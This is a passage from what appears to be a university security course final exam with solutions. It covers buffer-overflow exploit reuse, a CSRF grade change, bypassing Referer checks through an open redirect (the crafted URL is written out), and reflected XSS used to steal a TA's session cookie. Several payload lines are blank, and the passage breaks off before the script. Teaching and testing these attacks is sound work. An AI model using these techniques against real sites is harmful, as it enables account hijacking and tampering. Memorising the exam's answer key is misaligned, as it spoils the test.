char buf[8]; /∗ &buf = 0x08402020 ∗/
FILE ∗fp; /∗ &fp = 0x08402028 ∗/
int main() { /∗ rest of main is the same, but no variables ∗/ }
Final Exam
Page 21 of 28
CS 161 – Spring 2019
True or False: It is possible to modify the exploit in part (a) to exploit this modified program.
True
False
Solution: Yep, just change the addresses.
Problem 9 Hacking the 161 Staff (10 points)
After months of development, the CS 161 staff is ready to unveil their new course homepage at http://cs161.org. Each TA has their own account and, after authenticating on http://cs161.org/login, can update any student’s grade on the final exam by making an HTTP GET request to:
http://cs161.org/updatefinal?sid=
where
the percent sign).
(a) Mallory is a student in CS 161, with the student ID of 12345678. She wants to use a CSRF attack to change her exam score to 100 percent. She overhears her TA mention in discussion that he likes to visit http://cool-web-forum.com which Mallory happens to know does not properly sanitize HTML in user inputs.
⋄ Question: Give an input which Mallory can post to the forum in order to execute a CSRF attack to change her exam score, assuming there are no CSRF defenses on cs161.org.
______________________________________________________________________
______________________________________________________________________
Solution: Some possible solutions include:
•
•
We tried to be lenient with syntax, but solutions with very poor syntax received reduced credit. Half the points come from having the right link, and the other half come from putting it in an tag or something similar. Note that just posting the link it not enough, since we didn’t
state the TA would click it.
(b) The TA then visits the web forum, yet Mallory’s grade does not change. Mallory deduces that the 161 staff must have included a defense for CSRF on their webpage. Not one to be deterred, Mallory decides to attempt her attack again.
The login page has an open redirect: It can be provided a webpage to automatically redirect to after the user successfully authenticates. For example the URL:
http://cs161.org/login?to=http://google.com would redirect any logged in user to http://google.com.
Using this information, Mallory crafts the following attack—replacing your URL in part (a) with the following URL:
http://cs161.org/login?to=http://cs161.org/updatefinal?sid=12345678&score=100
A few minutes later, Mallory observes that her final grade is changed to a 100 percent. Which of the following are CSRF defenses that Mallory might have circumvented?
Final Exam Page 22 of 28 CS 161 – Spring 2019
Origin checking Referer checking CSRF tokens
Content-Security-Policy Prepared statements Session cookies
Cookie policy Same-origin policy None of the above
Solution: The TA website must have been using Referer validation. Initally the Referer for the request was the web forum, but using the open redirect Mallory was able to make the Referer the TA website itself.
Note that this would not work against validation of the Origin header, which would still contain the web forum. All of the other defenses listed have nothing to do with the redirect, and so they do not apply.
Final Exam
Page 23 of 28
CS 161 – Spring 2019
(c) The 161 staff update their site to better protect against CSRF. Mallory now notices that the website contains a profile page for each member of the 161 staff, reachable from the URL
http://cs161.org/staff?name=
where
Suspecting that this website might be vulnerable to reflected XSS, Mallory visits the following URL:
http://cs161.org/staff?name=
A Javascript popup immediately appears on her screen. Mallory smiles, realizing that she can weaponize this to login as her TA. She returns to the web forum that her TA frequently visits and posts a link.
Assume that Mallory’s TA will click on any link that he sees on the web forum, and assume that Mallory controls her own website http://mallory.com.
⋄ Question: How can Mallory pull off her attack and login as her TA? Make sure to include the link she posts on the forum in your answer. If you assume that Mallory’s website has any scripts running, you must define what they are and what inputs they take in.
Solution: Mallory can use the reflected XSS vulnerability to grab her TA’s cookie, which can then be used to hijack his session and change her grade. She can grab his cookie by making him click the link:
http://cs161.org/staff?name=
where the script is something like: